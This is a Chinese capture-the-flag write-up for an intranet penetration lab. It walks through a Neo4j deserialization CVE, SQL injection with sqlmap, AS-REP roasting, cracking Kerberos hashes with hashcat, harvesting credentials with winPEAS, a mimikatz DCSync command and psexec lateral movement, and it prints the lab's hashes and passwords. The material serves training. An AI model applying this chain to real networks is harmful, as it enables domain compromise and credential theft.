春秋云镜-Time - WP

内网渗透
90

fscan扫描

39.99.224.36:22 open39.99.224.36:1337 open39.99.224.36:7473 open39.99.224.36:7474 open39.99.224.36:7687 open39.99.224.36:42265 open

7687是个Neo4j

打CVE-2021-34371 Neo4j反序列化漏洞

image-20231011123317634

/home下拿到第一个flag

image-20231011123358109

给了个提示Do you know the authentication process of Kerberos?

fscan扫内网 整理一下

172.22.6.12  DC-PROGAME.xiaorang.lab172.22.6.25  XIAORANG\WIN2019172.22.6.36 (已经拿下)172.22.6.38  普通机器 80端口title为后台登陆

admin 1'or'1 可以登陆,存在sql注入

拿sqlmap跑

image-20231011124645035

在oa_f1Agggg里得到第二个flag

在oa_admin里得到 administrator:bo2y8kAL3HnXUiQo

oa_users里面得到500个用户

尝试 AS-REP Roasting

$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:facdaf9d4873ce4157cf4a0b21f5ae84$3df161d4b10148733fe2477420ed69982e30b9462f5f2f0a480759dfc236f63ef0fb8b64e0041e5a89da482bd351cae2e5ebd8e63e0f5311614cba5cde614872b369b02b0456c3863870297327df58a2fe84a4aa318038bebec7161ef52dd37b334e118dfc7adb3ac792c09fadc5d2f7a9cfa74dfc386a8e179db2808412dd7f242fdc3fe61c3bf2129000f6ac357708acd6ad6881d29a86e02e9f4852830672345d3c2cd2fea5b1607eae4822eaddd1c713dd88ba2c5701616b2b7f7fd91e8e947b02d00c6c905d4f2d32827883abbdb6696e060eed2b32d6d73948e9888e82ed3735164bc63818a92b878b

跑出两个

$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:facdaf9d4873ce4157cf4a0b21f5ae84$3df161d4b10148733fe2477420ed69982e30b9462f5f2f0a480759dfc236f63ef0fb8b64e0041e5a89da482bd351cae2e5ebd8e63e0f5311614cba5cde614872b369b02b0456c3863870297327df58a2fe84a4aa318038bebec7161ef52dd37b334e118dfc7adb3ac792c09fadc5d2f7a9cfa74dfc386a8e179db2808412dd7f242fdc3fe61c3bf2129000f6ac357708acd6ad6881d29a86e02e9f4852830672345d3c2cd2fea5b1607eae4822eaddd1c713dd88ba2c5701616b2b7f7fd91e8e947b02d00c6c905d4f2d32827883abbdb6696e060eed2b32d6d73948e9888e82ed3735164bc63818a92b878b$krb5asrep$23$wenshao@xiaorang.lab@XIAORANG.LAB:367124bb06e2a61242eab446212ef88c$67bc55bb143786fc63d2de91002775025c69372a966cd2f2bc10093c295f18b02580a31a381f5b8b4732f1146aa2338481fe38f3fabfbe516a1035b8da0f1028933f6e3d3b1cc55f5802ce5b124b818dbbb739328fe2469375c2b5bb4da18168bca52a25ca080a69ed37fbce128747fb3d0eb09abe4928de5c9e85bff18048514bd334b136409ecf495d5d0b857dbea2d70bac981dc0b7e610c6e2230f2365fc082ac446cbf923d25596b27c70126465699476dd099aaf88c6b89378abce73aaef7217ee8d954e5c066a65d4c5c02694ff3887ba3ae5cedbcf77bde2fa0f590eb642cadda08ff9a0cc430097

直接跑hashcat

image-20231011125945795

zhangxin@xiaorang.lab strawberrywenshao@xiaorang.lab  hellokitty

RDP进172.22.6.25

image-20231011130955021

上传winPEAS.bat

抓到yuxuan的明文密码

image-20231011132058969

Yuxuan7QbrgZ3L

而YUXUAN的sidHistory为域管,也就是yuxuan具有域管的权限

换yuxuan登陆 然后DcSync

lsadump::dcsync /domain:xiaorang.lab /user:Administrator

image-20231011132732817

然后psexec横移到两台机器拿下两个flag